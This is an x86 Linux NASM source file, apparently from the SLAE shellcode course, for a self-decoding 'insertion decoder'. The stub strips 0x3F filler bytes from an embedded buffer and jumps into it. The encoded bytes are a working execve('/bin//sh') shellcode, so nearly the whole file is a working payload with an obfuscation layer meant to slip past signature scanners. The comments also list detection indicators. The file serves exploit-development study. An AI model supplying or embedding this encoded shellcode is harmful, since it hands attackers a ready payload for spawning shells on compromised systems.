; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/4th.assignment/insertion_decoder.asm
;-----------------------------------------------------------------------
; Insertion decoder (self-decoding stub), 32-bit x86 Linux, NASM/Intel syntax.
;
; Layout: the bytes at `execve` are the author's payload with a filler
; byte (0x3F) inserted between payload bytes and a 0xF1F1 terminator at
; the end. At run time the loop below strips the fillers IN PLACE (the
; write cursor never overtakes the read cursor, see invariant) and then
; jumps to the start of the buffer, which by then holds the decoded bytes.
;
; Register roles:
;   esi = base address of the encoded buffer (obtained via jmp/call/pop)
;   edi = write cursor (next decoded byte goes here)
;   ecx = read index into the encoded buffer
;   ebx = scratch: dword loaded from [esi + ecx]; bl = current byte
;
; Assumptions / caveats a reviewer should know:
;   * The loop writes into the same section the code lives in (.text),
;     so this only runs if the text segment is mapped writable+executable
;     (e.g. linked with a writable text segment); under a normal W^X
;     mapping the first `mov byte [edi], bl` faults.
;   * The encoder must guarantee the real payload contains no 0x3F byte
;     (it would be dropped) and no adjacent 0xF1 0xF1 pair (it would be
;     taken as the terminator).
;   * Each iteration loads a dword, so the last iterations read 1-2 bytes
;     past the terminator; harmless unless the buffer ends a mapping.
;   * Detection note: the jmp/call/pop address-discovery idiom plus a
;     writable, executable text segment are the classic indicators this
;     kind of self-modifying stub leaves for scanners and loader policies.
;-----------------------------------------------------------------------
global _start
section .text
_start:
jmp getaddress ; first hop of the jmp/call/pop trick that yields the buffer address
mainflow:
pop esi ; esi = return address pushed by `call mainflow` = address of `execve` (the encoded buffer)
lea edi, [esi] ; edi = esi: write cursor starts at the buffer base (same effect as `mov edi, esi`)
xor ecx, ecx ; ecx = 0: read index
decoder:
; invariant: edi <= esi + ecx here, so the store to [edi] below never clobbers a byte not yet read
mov ebx, dword [esi + ecx] ; load four bytes (a dword) at the read index; bl = current byte, bx = current byte pair
inc ecx ; advance the read index for the next iteration
cmp bx, 0xF1F1 ; low 16 bits equal to the terminator signature (the last two db bytes below)?
je short execve ; yes: the decoded payload now sits at `execve`; run it
cmp bl, 0x3F ; filler byte? (0x3F = AAS, chosen by the author as a rarely used opcode)
; 3F is the least used opcode as analyzed here http://z0mbie.host.sk/opcodes.html (I know that it's a PE)
je short decoder ; filler: skip it and leave the write cursor where it is
mov byte [edi], bl ; real byte: store it at the write cursor
inc edi ; advance the write cursor
jmp short decoder ; next byte
getaddress:
call mainflow ; pushes the address of `execve` (the next "instruction") and returns control to mainflow
execve: db 0x3F, 0x3F, 0x3F, 0x31, 0x3F, 0xc9, 0x3F, 0xf7, 0xe1, 0x3F ; encoded payload: the author's execve stub interleaved with 0x3F fillers
db 0xb0, 0x0b, 0x3F, 0x51, 0x68, 0x3F, 0x2f, 0x2f, 0x3F, 0x73
db 0x68, 0x3F, 0x68, 0x2f, 0x3F, 0x62, 0x69, 0x3F, 0x6e, 0x89
db 0x3F, 0xe3, 0xcd, 0x3F, 0x80
db 0xF1, 0xF1 ; the two last bytes are the stop signature